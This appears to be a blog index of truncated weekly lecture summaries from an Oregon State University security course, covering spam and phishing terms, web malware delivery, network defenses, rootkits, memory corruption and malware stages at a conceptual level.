OSU CS373 - Defense Against the Dark Arts

This week we will be focusing on messaging security, or email security. Several terms will be defined and used this week. Spam - illegitimate email message that is phishing or intending to do harm Ham - legitimate email message Spamtrap/honeypot - an email address or domain that doesn't have any filtering on it to collect spam. The spam is then analyzed to study spam trends Botnet - a collection of computers that have been hijacked to perform an action (such as spamming) that the end user does not condone Snowshoe spam - distributed spamming efforts across a broad footprint Phishing - a general spam message that tries to get information that targets a wide demographic Spear Phishing - a targeted phishing attack against a specific person or demographic Realtime Blackhole List (RBL) - a list of known IPs that send spam Heuristics - a spam detection technique that uses basic feature matches (strings, sender, etc) to detect spam. If a message matches the phrase "buy <...

95% of all malware (both enterprise and consumer) is delivered via the Internet. The timeline of web-based malware delivery has rapidly changed in a short amount of time. Originally phishing attacks were primarily via redirections to fake websites. As time goes on, phishing got more sophisticated and browser-specific attacks became more common. Currently a lot of attacks remain in the browser and don't write to disk as at this point they will be detected by anti-virus software. This image below shows a basic timeline of web-based malware. source: lecture slides, Oregon State University CS373 Defense Against the Dark Arts In terms of web attacks and Windows, there are a couple of different malware injection points. From the top layer down, de-obfuscated content (final rendered content) such as the browser and extensions, Javascript for the script engine, HTML (DOM Tree) also at the browser and extensions, HTML (raw HTML) such as WinInet and ETW/ETL, and HTTP at the HTTP proxy...

Last week we were deep down in memory. This week we will start to work our way back up to a more familiar space. Specifically we will discuss network security. Why is network security important? First and foremost it can keep threats from the host machine. However it is also used to protect against threats from the network itself as well as threats coming in from the network (think DDoS attacks). There are many different protection strategies to try and prevent network attacks. Positive Policy - This is also known as whitelisting. This is a list of expected behaviors from a network. By knowing what is expected, unexpected behaviors can be quickly identified. Firewall - This is the machine that processes the list of expected vs. unexpected behaviors on the network. An analogy the lecturer used was an attack surface. The attack surface is the set of operations that the network is willing to respond to.  Various zones of the network are created and identified (e.g. intranet, Int...

This week we will be primarily focusing on rootkits. A rootkit is a piece of malware that conceals its activities and existence from the user. The ushering in of this new era of malware came into focus in 2006 when Sony released a disk to try and prevent copying of music. In this piece of software any file that started with $sys$ was hidden from the user. Attackers saw the potential of this and gained control of this method. The majority of rootkits operate in a 32 bit Windows environment however some rootkits target a 64 bit environment. Most rootkits are at the kernel level because at this level they have full access and control to the system. The slide below is a nice illustration what the computer architecture looks like and where rootkits are located. slide source from lecture, OSU CS 373 Definitions for this week: thread - the smallest unit of execution within an operating system. The slide below has a nice demonstration of how a thread is executed hooking - redirecting...

There are two main components to hacking, finding "bugs" in the software that allows the user to interact with a program in an unintended way and configuration vulnerabilities (an example of a configuration vulnerability is a weak password). Hacking used to primarily focus on a company's perimeter systems (parts of the system that are exposed to the internet), but as defense against those types of attacks have been improved hackers are now targeting the internal systems aka the system's users. Memory corruption is a key area that attackers can examine to try and gain access to the system. The definition used by the lecturer this week is: "Accessing (reading/writing) memory (stack/heap) in an invalid (originally unintended) way which results in an undefined behavior (what we are looking to control)." There are four common categories of memory corruption: lifetime control, uninitiated memory, array index calculations, and buffer length calculations. A stan...

Attack vector graph sourced from lecture slides provided by Oregon State University CS373 There are four key things that malware do, first contact, code execution, establish presence, and perform malicious activity. First contact: can come in many different ways including email attachments, spoofing an ad network which is also known as malvertizing,  instant messaging, poisoned search results, watering hole which is a term for poisoning a website that people routinely frequent, and physical contact such as a USB stick. Execute: there are three main methods of execution, social engineering, exploitation, and code that is passed as a feature and not a bug. Establish presence: the malware may try and blend in by having filenames that are very similar to operating system names. The malware can also modify date/time installation and modification. Malware can also hide in rootkits or bootkits. A piece of malware has to also persist after it has been established. The easiest ...